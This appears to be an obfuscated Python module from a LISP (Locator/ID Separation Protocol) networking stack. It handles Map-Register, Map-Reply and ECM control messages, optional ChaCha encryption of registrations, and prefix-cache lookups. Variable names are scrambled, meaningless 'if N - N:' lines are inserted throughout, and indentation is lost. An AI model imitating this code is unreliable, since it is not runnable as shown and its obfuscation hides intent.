if 31 - 31: I11i - iIii1I11I1II1 * Ii1I + Ii1I
O0ooOOo0 . print_ecm ( )
if 10 - 10: OoOoOO00 - i11iIiiIii % iIii1I11I1II1 / ooOoO0o * i11iIiiIii - Ii1I
Ii1I1i1IiiI = lisp_control_header ( )
if ( Ii1I1i1IiiI . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
if 64 - 64: II111iiii . i11iIiiIii . iII111i . OOooOOo
if 95 - 95: O0 - OoOoOO00
o0OOo0OOo0Oo = Ii1I1i1IiiI . type
del ( Ii1I1i1IiiI )
if 51 - 51: oO0o . OoooooooOO + OOooOOo * I1ii11iIi11i - ooOoO0o
if ( o0OOo0OOo0Oo != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
if 41 - 41: Oo0Ooo
if 46 - 46: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii . iII111i
if 66 - 66: oO0o % i1IIi % OoooooooOO
if 58 - 58: OOooOOo
if 89 - 89: iIii1I11I1II1 - i1IIi
I111iI1i = O0ooOOo0 . udp_sport
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
O0ooOOo0 . source , I111iI1i , O0ooOOo0 . ddt , - 1 )
return
if 83 - 83: I1Ii111 * II111iiii
if 28 - 28: I11i - Oo0Ooo + iIii1I11I1II1 + O0 * Ii1I + I1IiiI
if 13 - 13: iII111i
if 42 - 42: I1Ii111 - I1IiiI % I1IiiI * I1IiiI
if 70 - 70: O0 / I1IiiI / I1IiiI
if 71 - 71: OOooOOo - Oo0Ooo + IiII * oO0o
if 90 - 90: OoOoOO00 * I1ii11iIi11i
if 16 - 16: i1IIi - OoO0O00
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00 - ooOoO0o + ooOoO0o % ooOoO0o % II111iiii
if 16 - 16: I1IiiI . Ii1I
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
if 80 - 80: OOooOOo * O0 / iIii1I11I1II1 / IiII / OoOoOO00
if 15 - 15: I1ii11iIi11i * iII111i + i11iIiiIii
if 68 - 68: i1IIi / oO0o * I1ii11iIi11i - OoOoOO00 + Oo0Ooo / O0
if 1 - 1: ooOoO0o - Oo0Ooo + I1Ii111
if 90 - 90: I1Ii111 * O0 . iII111i - Oo0Ooo % iIii1I11I1II1
if 7 - 7: I1ii11iIi11i % o0oOOo0O0Ooo % O0 % iIii1I11I1II1
if 10 - 10: OoooooooOO - iII111i . i1IIi % oO0o . OoooooooOO + OOooOOo
oO0o0 = ms . map_server
if ( lisp_decent_push_configured and oO0o0 . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
oO0o0 = copy . deepcopy ( oO0o0 )
oO0o0 . address = 0x7f000001
I11i1iIiiIiIi = bold ( "Bootstrap" , False )
i11ii = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( I11i1iIiiIiIi , i11ii ) )
if 59 - 59: I1IiiI * OoooooooOO % OOooOOo / I11i
if 77 - 77: II111iiii - IiII % OOooOOo
if 22 - 22: OoooooooOO / oO0o
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
if 12 - 12: I1Ii111
packet = lisp_compute_auth ( packet , map_register , ms . password )
if 17 - 17: I1Ii111 % oO0o + O0
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
if ( ms . ekey != None ) :
IiiI = ms . ekey . zfill ( 32 )
i1Oo = "0" * 8
o0o0oO0OOO = chacha . ChaCha ( IiiI , i1Oo ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + o0o0oO0OOO
oOo = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( oOo , ms . ekey_id ) )
if 39 - 39: OoOoOO00 - I1ii11iIi11i / I1Ii111
if 48 - 48: IiII - oO0o + I11i % o0oOOo0O0Ooo
oOOOo = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
oOOOo = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
if 16 - 16: OoOoOO00 * iII111i . O0
if 60 - 60: IiII . I11i * Oo0Ooo . i1IIi
lprint ( "Send Map-Register to map-server {}{}{}" . format ( oO0o0 . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , oOOOo ) )
if 3 - 3: Ii1I
lisp_send ( lisp_sockets , oO0o0 , LISP_CTRL_PORT , packet )
return
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if 81 - 81: I11i % Oo0Ooo / iII111i
if 44 - 44: Oo0Ooo
if 90 - 90: Oo0Ooo . ooOoO0o / IiII * I1Ii111 . ooOoO0o + II111iiii
if 43 - 43: iIii1I11I1II1 % OOooOOo + OoOoOO00 + I1ii11iIi11i - Oo0Ooo / Ii1I
if 94 - 94: Ii1I / Oo0Ooo % II111iiii % Oo0Ooo * oO0o
if 54 - 54: O0 / ooOoO0o * I1Ii111
if 5 - 5: Ii1I / OoOoOO00 - O0 * OoO0O00
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
oo00Oo0 = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
if 13 - 13: IiII + Oo0Ooo - I1Ii111
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
if 10 - 10: OOooOOo % OoooooooOO / I1IiiI . II111iiii % iII111i
if 47 - 47: o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - ooOoO0o * oO0o
packet = lisp_control_packet_ipc ( packet , oo00Oo0 , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
if 95 - 95: oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
if 39 - 39: OoO0O00 + II111iiii
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
if 76 - 76: o0oOOo0O0Ooo
if 55 - 55: OOooOOo + I1ii11iIi11i * Oo0Ooo
if 11 - 11: i1IIi - OoooooooOO * OoOoOO00 / oO0o - OoooooooOO - I1IiiI
if 22 - 22: i11iIiiIii . Ii1I . Oo0Ooo * Oo0Ooo - iII111i / I1ii11iIi11i
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 49 - 49: iII111i + I11i . Oo0Ooo
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
if 48 - 48: OoO0O00 . iIii1I11I1II1 - OoooooooOO + I1Ii111 / i11iIiiIii . Oo0Ooo
if 61 - 61: II111iiii + OOooOOo . o0oOOo0O0Ooo . iIii1I11I1II1
if 63 - 63: I11i + i11iIiiIii . o0oOOo0O0Ooo . i1IIi + OoOoOO00
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 1 - 1: i11iIiiIii
if 1 - 1: iIii1I11I1II1
if 73 - 73: iII111i + IiII
if 95 - 95: O0
if 75 - 75: ooOoO0o
if 8 - 8: O0 - OoooooooOO + I1ii11iIi11i / Oo0Ooo . oO0o + I1Ii111
if 85 - 85: ooOoO0o
if 29 - 29: iII111i . Ii1I
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 43 - 43: I11i - I1ii11iIi11i + iIii1I11I1II1 / I1ii11iIi11i * oO0o / iIii1I11I1II1
if 45 - 45: IiII
if 49 - 49: I1IiiI . Ii1I * I1IiiI - OoooooooOO . I11i / I1Ii111
if 9 - 9: iIii1I11I1II1 * Ii1I / O0 - OOooOOo
if 95 - 95: i11iIiiIii * II111iiii * OOooOOo * iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 / I1IiiI + OoOoOO00 - OOooOOo . i11iIiiIii / i11iIiiIii
if 10 - 10: iIii1I11I1II1 % i1IIi
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if 78 - 78: I11i + II111iiii % o0oOOo0O0Ooo
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
if 44 - 44: I1ii11iIi11i
if 39 - 39: iII111i + Oo0Ooo / oO0o
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
if 99 - 99: I1IiiI * II111iiii
if 84 - 84: II111iiii - I1IiiI
if ( lisp_nat_traversal ) :
i1i1IIiII1I = lisp_get_any_translated_port ( )
if ( i1i1IIiII1I != None ) : inner_sport = i1i1IIiII1I
if 41 - 41: iIii1I11I1II1 % I1Ii111 % OoOoOO00
O0ooOOo0 = lisp_ecm ( inner_sport )
if 35 - 35: I11i + i1IIi
O0ooOOo0 . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
O0ooOOo0 . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
O0ooOOo0 . ddt = ddt
O0o0oOO0o0Oo = O0ooOOo0 . encode ( packet , inner_source , inner_dest )
if ( O0o0oOO0o0Oo == None ) :
lprint ( "Could not encode ECM message" )
return
if 87 - 87: II111iiii % I1IiiI + oO0o - I11i / I11i
O0ooOOo0 . print_ecm ( )
if 16 - 16: I1IiiI
packet = O0o0oOO0o0Oo + packet
if 39 - 39: ooOoO0o * II111iiii
oo0o00OO = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( oo0o00OO ) )
oO0o0 = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , oO0o0 , LISP_CTRL_PORT , packet )
return
if 90 - 90: OoooooooOO * ooOoO0o
if 14 - 14: I1IiiI % i1IIi
if 35 - 35: ooOoO0o % o0oOOo0O0Ooo % ooOoO0o
if 77 - 77: OOooOOo % I1Ii111 / i11iIiiIii . i1IIi % OOooOOo
if 55 - 55: i1IIi
if 64 - 64: oO0o . OOooOOo * i11iIiiIii + I1Ii111
if 88 - 88: O0
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 75 - 75: iII111i - Oo0Ooo / OoooooooOO - O0
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 36 - 36: OoO0O00 % Ii1I . Oo0Ooo
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 90 - 90: i11iIiiIii - iII111i * oO0o
if 79 - 79: IiII
if 38 - 38: I1Ii111
if 56 - 56: i11iIiiIii
if 58 - 58: i11iIiiIii / OoOoOO00
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
if 39 - 39: Oo0Ooo . OoO0O00
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
if 100 - 100: ooOoO0o / OoooooooOO
if 73 - 73: i11iIiiIii - Oo0Ooo
if 100 - 100: iIii1I11I1II1 + I1Ii111
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
def byte_swap_64 ( address ) :
IiiIIi1 = ( ( address & 0x00000000000000ff ) << 56 ) | ( ( address & 0x000000000000ff00 ) << 40 ) | ( ( address & 0x0000000000ff0000 ) << 24 ) | ( ( address & 0x00000000ff000000 ) << 8 ) | ( ( address & 0x000000ff00000000 ) >> 8 ) | ( ( address & 0x0000ff0000000000 ) >> 24 ) | ( ( address & 0x00ff000000000000 ) >> 40 ) | ( ( address & 0xff00000000000000 ) >> 56 )
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
if 81 - 81: I1IiiI
if 82 - 82: I1Ii111 - OoooooooOO - Ii1I
if 34 - 34: OOooOOo . iIii1I11I1II1 / I1IiiI . Oo0Ooo - iIii1I11I1II1
if 83 - 83: iII111i - I1ii11iIi11i + iII111i
if 4 - 4: o0oOOo0O0Ooo % iIii1I11I1II1 + I11i
if 60 - 60: I1ii11iIi11i / I1Ii111 % i11iIiiIii % oO0o % I1IiiI . Oo0Ooo
if 20 - 20: IiII - OOooOOo + OoOoOO00
return ( IiiIIi1 )
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
if 74 - 74: OoO0O00
if 13 - 13: I1ii11iIi11i / OoO0O00
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
if 94 - 94: IiII * i1IIi
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
if 33 - 33: O0 - iII111i
class lisp_cache_entries ( ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
if 40 - 40: iII111i * I11i
if 25 - 25: O0 * o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 87 - 87: OoOoOO00
class lisp_cache ( ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
if 30 - 30: IiII % OoOoOO00 + I1Ii111
if 13 - 13: iII111i * Ii1I % o0oOOo0O0Ooo * i1IIi . IiII % i1IIi
def cache_size ( self ) :
return ( self . cache_count )
if 79 - 79: OoooooooOO % I11i / o0oOOo0O0Ooo + IiII + O0 + iII111i
if 87 - 87: I11i
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
o00O0Oo = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
o00O0Oo = prefix . mask_len
else :
o00O0Oo = prefix . mask_len + 48
if 39 - 39: I1ii11iIi11i * i11iIiiIii % I1Ii111
if 72 - 72: OoO0O00 * Oo0Ooo - IiII
o0OoO0000o = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
O000oOOoOOO = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if 74 - 74: Ii1I
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
iiiIIiiIi = prefix . addr_length ( ) * 2
IiiIIi1 = lisp_hex_string ( prefix . address ) . zfill ( iiiIIiiIi )
else :
IiiIIi1 = prefix . address
if 26 - 26: I11i . O0
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
O000oOOoOOO = "8003"
IiiIIi1 = prefix . address . print_geo ( )
else :
O000oOOoOOO = ""
IiiIIi1 = ""
if 68 - 68: Ii1I
if 26 - 26: o0oOOo0O0Ooo - I1ii11iIi11i / O0 % i11iIiiIii
ii1i1I1111ii = o0OoO0000o + O000oOOoOOO + IiiIIi1
return ( [ o00O0Oo , ii1i1I1111ii ] )
if 7 - 7: I1Ii111 . Oo0Ooo + IiII / iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 - O0 . iII111i - IiII - ooOoO0o
def add_cache ( self , prefix , entry ) :
if ( prefix . is_binary ( ) ) : prefix . zero_host_bits ( )
o00O0Oo , ii1i1I1111ii = self . build_key ( prefix )
if ( self . cache . has_key ( o00O0Oo ) == False ) :
self . cache [ o00O0Oo ] = lisp_cache_entries ( )
self . cache [ o00O0Oo ] . entries = { }
self . cache [ o00O0Oo ] . entries_sorted = [ ]
self . cache_sorted = sorted ( self . cache )
if 54 - 54: OoO0O00 . iII111i . OoOoOO00 * OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
if ( self . cache [ o00O0Oo ] . entries . has_key ( ii1i1I1111ii ) == False ) :
self . cache_count += 1
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
self . cache [ o00O0Oo ] . entries [ ii1i1I1111ii ] = entry
self . cache [ o00O0Oo ] . entries_sorted = sorted ( self . cache [ o00O0Oo ] . entries )
if 9 - 9: o0oOOo0O0Ooo
if 23 - 23: ooOoO0o * OoO0O00 + O0 % I1Ii111
def lookup_cache ( self , prefix , exact ) :
i1Iiiii111Ii , ii1i1I1111ii = self . build_key ( prefix )
if ( exact ) :
if ( self . cache . has_key ( i1Iiiii111Ii ) == False ) : return ( None )
if ( self . cache [ i1Iiiii111Ii ] . entries . has_key ( ii1i1I1111ii ) == False ) : return ( None )
return ( self . cache [ i1Iiiii111Ii ] . entries [ ii1i1I1111ii ] )
if 81 - 81: OoOoOO00 / O0 - IiII
if 88 - 88: OoO0O00 % Ii1I
OOo00oO0oo = None
for o00O0Oo in self . cache_sorted :
if ( i1Iiiii111Ii < o00O0Oo ) : return ( OOo00oO0oo )
for iiiIii1 in self . cache [ o00O0Oo ] . entries_sorted :
oOooiIIIii1Ii1Ii1 = self . cache [ o00O0Oo ] . entries
if ( iiiIii1 in oOooiIIIii1Ii1Ii1 ) :
I1iII11ii1 = oOooiIIIii1Ii1Ii1 [ iiiIii1 ]
if ( I1iII11ii1 == None ) : continue
if ( prefix . is_more_specific ( I1iII11ii1 . eid ) ) : OOo00oO0oo = I1iII11ii1
if 86 - 86: I1ii11iIi11i - Ii1I / IiII
if 91 - 91: ooOoO0o * i11iIiiIii / O0 % Ii1I
if 35 - 35: Oo0Ooo % O0
return ( OOo00oO0oo )
if 71 - 71: oO0o % OOooOOo * i1IIi
if 50 - 50: OoOoOO00 + i1IIi
def delete_cache ( self , prefix ) :
o00O0Oo , ii1i1I1111ii = self . build_key ( prefix )
if ( self . cache . has_key ( o00O0Oo ) == False ) : return
if ( self . cache [ o00O0Oo ] . entries . has_key ( ii1i1I1111ii ) == False ) : return
self . cache [ o00O0Oo ] . entries . pop ( ii1i1I1111ii )
self . cache [ o00O0Oo ] . entries_sorted . remove ( ii1i1I1111ii )
self . cache_count -= 1
if 9 - 9: iII111i / I1Ii111 * Ii1I
if 25 - 25: OoO0O00 . iII111i % I11i . oO0o * iII111i + Oo0Ooo
def walk_cache ( self , function , parms ) :
for o00O0Oo in self . cache_sorted :
for ii1i1I1111ii in self . cache [ o00O0Oo ] . entries_sorted :
I1iII11ii1 = self . cache [ o00O0Oo ] . entries [ ii1i1I1111ii ]
O00O00o0O0O , parms = function ( I1iII11ii1 , parms )
if ( O00O00o0O0O == False ) : return ( parms )
if 32 - 32: IiII
if 90 - 90: I1ii11iIi11i / I11i * o0oOOo0O0Ooo % O0 * i11iIiiIii
return ( parms )
if 68 - 68: I11i . Ii1I + I11i / IiII . I11i / iIii1I11I1II1
if 96 - 96: O0
def print_cache ( self ) :
lprint ( "Printing contents of {}: " . format ( self ) )
if ( self . cache_size ( ) == 0 ) :
lprint ( " Cache is empty" )
return
if 2 - 2: OoO0O00 / iII111i + o0oOOo0O0Ooo
for o00O0Oo in self . cache_sorted :
for ii1i1I1111ii in self . cache [ o00O0Oo ] . entries_sorted :
I1iII11ii1 = self . cache [ o00O0Oo ] . entries [ ii1i1I1111ii ]
lprint ( " Mask-length: {}, key: {}, entry: {}" . format ( o00O0Oo , ii1i1I1111ii ,
I1iII11ii1 ) )
if 27 - 27: I11i - OoOoOO00 - ooOoO0o - I1IiiI
if 51 - 51: I11i + I11i + O0 + O0 * I1Ii111
if 61 - 61: IiII . O0
if 38 - 38: Ii1I * I1ii11iIi11i - i11iIiiIii + ooOoO0o * I11i
if 74 - 74: OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: ooOoO0o + I1ii11iIi11i * i11iIiiIii / i1IIi
if 95 - 95: oO0o / IiII * II111iiii * Ii1I . OoO0O00 . OoO0O00
if 85 - 85: I1IiiI / II111iiii * OoO0O00 + ooOoO0o / OoO0O00 % OOooOOo
lisp_referral_cache = lisp_cache ( )
lisp_ddt_cache = lisp_cache ( )
lisp_sites_by_eid = lisp_cache ( )
lisp_map_cache = lisp_cache ( )
lisp_db_for_lookups = lisp_cache ( )
if 100 - 100: I1Ii111 % OoooooooOO % OoOoOO00 % I1IiiI
if 32 - 32: OoO0O00 + OOooOOo . OoO0O00 - Oo0Ooo
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
if 86 - 86: OOooOOo / OoooooooOO - IiII
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if 21 - 21: O0 . OoO0O00 * I1ii11iIi11i % iII111i + OoooooooOO
def lisp_map_cache_lookup ( source , dest ) :
if 8 - 8: oO0o * iII111i * I11i
iIIiI = dest . is_multicast_address ( )
if 30 - 30: I1Ii111
if 61 - 61: iII111i
if 50 - 50: Ii1I / I1IiiI . O0
if 49 - 49: I1Ii111 . OoO0O00 % O0
IiiiiII1i = lisp_map_cache . lookup_cache ( dest , False )
if ( IiiiiII1i == None ) :
I11i11i1 = source . print_sg ( dest ) if iIIiI else dest . print_address ( )
I11i11i1 = green ( I11i11i1 , False )
dprint ( "Lookup for EID {} not found in map-cache" . format ( I11i11i1 ) )
return ( None )
if 15 - 15: I11i - Oo0Ooo / I1Ii111 . ooOoO0o % I1IiiI
if 62 - 62: II111iiii + ooOoO0o + I1IiiI
if 70 - 70: o0oOOo0O0Ooo + Ii1I . OoO0O00 * Ii1I + OOooOOo + ooOoO0o
if 13 - 13: I1ii11iIi11i
if 97 - 97: oO0o - Oo0Ooo . i11iIiiIii % ooOoO0o * i11iIiiIii - OoooooooOO
if ( iIIiI == False ) :
IIiiiIiii = green ( IiiiiII1i . eid . print_prefix ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( dest . print_address ( ) , False ) , IIiiiIiii ) )
if 44 - 44: I11i % OoooooooOO / iII111i - i11iIiiIii * i1IIi * o0oOOo0O0Ooo
return ( IiiiiII1i )
if 51 - 51: Ii1I + IiII / I1ii11iIi11i + O0 % Ii1I
if 55 - 55: iII111i % o0oOOo0O0Ooo - oO0o % OoooooooOO
if 18 - 18: OoooooooOO - I1ii11iIi11i
if 94 - 94: OOooOOo . Oo0Ooo + Ii1I * o0oOOo0O0Ooo
if 79 - 79: OOooOOo + Oo0Ooo
IiiiiII1i = IiiiiII1i . lookup_source_cache ( source , False )
if ( IiiiiII1i == None ) :
I11i11i1 = source . print_sg ( dest )
dprint ( "Lookup for EID {} not found in map-cache" . format ( I11i11i1 ) )
return ( None )
if 33 - 33: iIii1I11I1II1
if 75 - 75: I1Ii111 / iIii1I11I1II1 . OoooooooOO
if 98 - 98: iIii1I11I1II1 / I1IiiI + i1IIi
if 80 - 80: II111iiii . Oo0Ooo * oO0o % II111iiii / I1ii11iIi11i
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
IIiiiIiii = green ( IiiiiII1i . print_eid_tuple ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( source . print_sg ( dest ) , False ) , IIiiiIiii ) )
if 99 - 99: OOooOOo
return ( IiiiiII1i )
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
if 56 - 56: Oo0Ooo % I1ii11iIi11i
if 53 - 53: OoO0O00 . I11i - ooOoO0o
if 11 - 11: I11i + i11iIiiIii / oO0o % oO0o * o0oOOo0O0Ooo / OoOoOO00
if 74 - 74: oO0o . I1Ii111 . II111iiii
def lisp_referral_cache_lookup ( eid , group , exact ) :
if ( group and group . is_null ( ) ) :
o0ooo000OO = lisp_referral_cache . lookup_cache ( eid , exact )
return ( o0ooo000OO )
if 92 - 92: I1Ii111 % OoooooooOO * I1Ii111
if 78 - 78: Oo0Ooo . I11i . oO0o + O0 / O0
if 41 - 41: iII111i * OoO0O00 - OoO0O00
if 72 - 72: o0oOOo0O0Ooo + oO0o . I1ii11iIi11i + OoO0O00 / I1Ii111
if 58 - 58: Oo0Ooo / II111iiii % OoooooooOO % II111iiii
if ( eid == None or eid . is_null ( ) ) : return ( None )
if 39 - 39: i1IIi
if 16 - 16: OoOoOO00 % iIii1I11I1II1 + Ii1I - o0oOOo0O0Ooo . Oo0Ooo + i1IIi
if 59 - 59: i1IIi
if 37 - 37: OoO0O00 / I1ii11iIi11i / OoOoOO00
if 15 - 15: I1IiiI % iIii1I11I1II1 . I1Ii111
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
o0ooo000OO = lisp_referral_cache . lookup_cache ( group , exact )
if ( o0ooo000OO == None ) : return ( None )
if 71 - 71: OOooOOo
I11iiiIIi1Ii1 = o0ooo000OO . lookup_source_cache ( eid , exact )
if ( I11iiiIIi1Ii1 ) : return ( I11iiiIIi1Ii1 )
if 96 - 96: iII111i * oO0o
if ( exact ) : o0ooo000OO = None
return ( o0ooo000OO )
if 40 - 40: I11i + oO0o - iIii1I11I1II1 + OoO0O00 . IiII
if 38 - 38: I1IiiI % I1Ii111 / OoOoOO00 . Ii1I . I11i
if 86 - 86: IiII + OoOoOO00 * IiII
if 44 - 44: OOooOOo * iIii1I11I1II1 * IiII + Oo0Ooo
if 60 - 60: I1Ii111
if 52 - 52: ooOoO0o . I1IiiI . i11iIiiIii . Ii1I - O0 - I1IiiI
if 53 - 53: i1IIi * OOooOOo - IiII * Oo0Ooo / OoooooooOO + OoooooooOO
def lisp_ddt_cache_lookup ( eid , group , exact ) :
if ( group . is_null ( ) ) :
oo00OOooo = lisp_ddt_cache . lookup_cache ( eid , exact )
return ( oo00OOooo )
if 10 - 10: oO0o - O0 / Ii1I - OOooOOo - I1Ii111
if 41 - 41: O0 / I1IiiI - I1ii11iIi11i - i11iIiiIii
if 2 - 2: OoO0O00 % O0 + iII111i * I1Ii111 / OOooOOo
if 7 - 7: IiII
if 30 - 30: iIii1I11I1II1 - OoooooooOO + Oo0Ooo . i1IIi % o0oOOo0O0Ooo
if ( eid . is_null ( ) ) : return ( None )
if 7 - 7: IiII - iII111i
if 59 - 59: Oo0Ooo * ooOoO0o - Ii1I / II111iiii / Oo0Ooo
if 8 - 8: IiII / OoooooooOO - iIii1I11I1II1
if 10 - 10: I11i . I11i - OoO0O00 - II111iiii
if 94 - 94: ooOoO0o
if 28 - 28: IiII
oo00OOooo = lisp_ddt_cache . lookup_cache ( group , exact )
if ( oo00OOooo == None ) : return ( None )
if 55 - 55: ooOoO0o + oO0o + OoOoOO00 / O0 * II111iiii * OoOoOO00
ooo000 = oo00OOooo . lookup_source_cache ( eid , exact )
if ( ooo000 ) : return ( ooo000 )
if 40 - 40: oO0o
if ( exact ) : oo00OOooo = None
return ( oo00OOooo )
if 31 - 31: Oo0Ooo * iIii1I11I1II1 * Ii1I * Ii1I
if 23 - 23: oO0o + OoO0O00 * O0
if 99 - 99: oO0o * IiII * oO0o
if 70 - 70: IiII + iII111i / I1ii11iIi11i
if 97 - 97: I1IiiI * OoOoOO00 / iII111i * i11iIiiIii
if 20 - 20: Ii1I . I11i % iII111i * iIii1I11I1II1 . OoO0O00 . Ii1I
if 50 - 50: I1IiiI % OOooOOo / iIii1I11I1II1 / I1ii11iIi11i % oO0o . Ii1I
def lisp_site_eid_lookup ( eid , group , exact ) :
if 14 - 14: oO0o / Ii1I - I1Ii111
if ( group . is_null ( ) ) :
oO00Oooo0o0o0 = lisp_sites_by_eid . lookup_cache ( eid , exact )
return ( oO00Oooo0o0o0 )
if 79 - 79: I1Ii111
if 54 - 54: II111iiii
if 98 - 98: Ii1I - i11iIiiIii
if 31 - 31: IiII / o0oOOo0O0Ooo
if 27 - 27: Oo0Ooo
if ( eid . is_null ( ) ) : return ( None )
if 32 - 32: Oo0Ooo * i11iIiiIii % I1IiiI - i11iIiiIii - I1Ii111 % I1ii11iIi11i
